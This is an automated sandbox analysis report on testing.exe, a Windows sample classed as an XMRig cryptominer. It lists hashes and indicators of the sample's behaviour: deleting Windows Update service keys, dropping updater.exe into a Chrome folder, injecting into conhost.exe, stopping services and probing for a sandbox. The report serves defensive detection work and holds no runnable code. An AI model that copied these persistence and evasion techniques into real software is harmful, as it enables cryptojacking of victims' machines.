xmrig | 9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

max time kernel
1800s
max time network
1802s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
30-03-2023 17:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

testing.exe
Size

2.1MB
MD5

a12bc9557ad889a49e7b4f970c78dda8
SHA1

5383b8e6d09d41384281b95f9ccc8e050e7c04fa
SHA256

9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0
SHA512

be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee
SSDEEP

24576:MHOygNfXDgkB9Y+AVIGckFdi3MUxbw+0AX4xVILyqe7keglf9BHHpRNt05sJNuI6:MuhBSda2+0+4xKLyqewBnfNwsJNO

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

Processes:

testing.exeupdater.execonhost.exeupdater.exe

description	pid	process	target process
PID 2128 created 3164	2128	testing.exe	Explorer.EXE
PID 2128 created 3164	2128	testing.exe	Explorer.EXE
PID 2128 created 3164	2128	testing.exe	Explorer.EXE
PID 2128 created 3164	2128	testing.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 3460 created 3164	3460	conhost.exe	Explorer.EXE
PID 3768 created 3164	3768	updater.exe	Explorer.EXE
PID 656 created 3164	656	updater.exe	Explorer.EXE
PID 656 created 3164	656	updater.exe	Explorer.EXE
PID 656 created 3164	656	updater.exe	Explorer.EXE
PID 656 created 3164	656	updater.exe	Explorer.EXE
PID 656 created 3164	656	updater.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 23 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3696-263-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-266-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-270-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-275-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-278-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-311-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-319-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-321-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-323-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-325-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-405-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-566-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-628-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-630-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-632-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-634-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-636-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-638-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-640-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-642-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-644-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-646-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig
behavioral2/memory/3696-648-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	xmrig

Drops file in Drivers directory 3 IoCs

Processes:

testing.exeupdater.exeupdater.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	testing.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 2 IoCs

Processes:

updater.exeupdater.exe

pid process

3768 updater.exe
656 updater.exe

pid	process
3768	updater.exe
656	updater.exe

UPX packed file 23 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3696-263-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-266-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-270-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-275-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-278-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-311-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-319-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-321-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-323-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-325-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-405-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-566-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-628-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-630-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-632-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-634-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-636-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-638-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-640-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-642-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-644-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-646-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx
behavioral2/memory/3696-648-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp	upx

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 3768 set thread context of 3460	3768	updater.exe	conhost.exe
PID 3768 set thread context of 3696	3768	updater.exe	conhost.exe

Drops file in Program Files directory 6 IoCs

Processes:

testing.exeupdater.execmd.execmd.exeupdater.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	testing.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1040	sc.exe
3528	sc.exe
3904	sc.exe
5048	sc.exe
4516	sc.exe
3540	sc.exe
3668	sc.exe
1748	sc.exe
988	sc.exe
4188	sc.exe
4192	sc.exe
5084	sc.exe
2840	sc.exe
4856	sc.exe
4084	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Modifies registry class 2 IoCs

Processes:

OpenWith.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exetesting.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.exe

pid	process
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
2128	testing.exe
2128	testing.exe
224	taskmgr.exe
4048	powershell.exe
4048	powershell.exe
2128	testing.exe
2128	testing.exe
2128	testing.exe
2128	testing.exe
2128	testing.exe
2128	testing.exe
4028	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
4028	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
2128	testing.exe
2128	testing.exe
3244	powershell.exe
3244	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
3768	updater.exe
3768	updater.exe
224	taskmgr.exe
3196	powershell.exe
3196	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
3768	updater.exe
3768	updater.exe
3768	updater.exe
3768	updater.exe
3768	updater.exe
3768	updater.exe
224	taskmgr.exe
4476	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskmgr.exeOpenWith.exe

pid process

224 taskmgr.exe
3240 OpenWith.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskmgr.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	224	taskmgr.exe
Token: SeSystemProfilePrivilege	224	taskmgr.exe
Token: SeCreateGlobalPrivilege	224	taskmgr.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeShutdownPrivilege	4756	powercfg.exe
Token: SeCreatePagefilePrivilege	4756	powercfg.exe
Token: SeShutdownPrivilege	4232	powercfg.exe
Token: SeCreatePagefilePrivilege	4232	powercfg.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	620	powercfg.exe
Token: SeCreatePagefilePrivilege	620	powercfg.exe
Token: SeShutdownPrivilege	2660	powercfg.exe
Token: SeCreatePagefilePrivilege	2660	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe
Token: 36	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe
Token: 36	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

OpenWith.exefirefox.exe

pid	process
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
3240	OpenWith.exe
4048	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exeupdater.execmd.execmd.exe

description	pid	process	target process
PID 1292 wrote to memory of 3528	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 3528	1292	cmd.exe	sc.exe
PID 1068 wrote to memory of 4756	1068	cmd.exe	powercfg.exe
PID 1068 wrote to memory of 4756	1068	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 4856	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 4856	1292	cmd.exe	sc.exe
PID 1068 wrote to memory of 4232	1068	cmd.exe	powercfg.exe
PID 1068 wrote to memory of 4232	1068	cmd.exe	powercfg.exe
PID 1068 wrote to memory of 620	1068	cmd.exe	powercfg.exe
PID 1068 wrote to memory of 620	1068	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 4084	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 4084	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 5084	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 5084	1292	cmd.exe	sc.exe
PID 1068 wrote to memory of 2660	1068	cmd.exe	powercfg.exe
PID 1068 wrote to memory of 2660	1068	cmd.exe	powercfg.exe
PID 1292 wrote to memory of 4516	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 4516	1292	cmd.exe	sc.exe
PID 1292 wrote to memory of 4908	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 4908	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1444	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1444	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 2236	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 2236	1292	cmd.exe	reg.exe
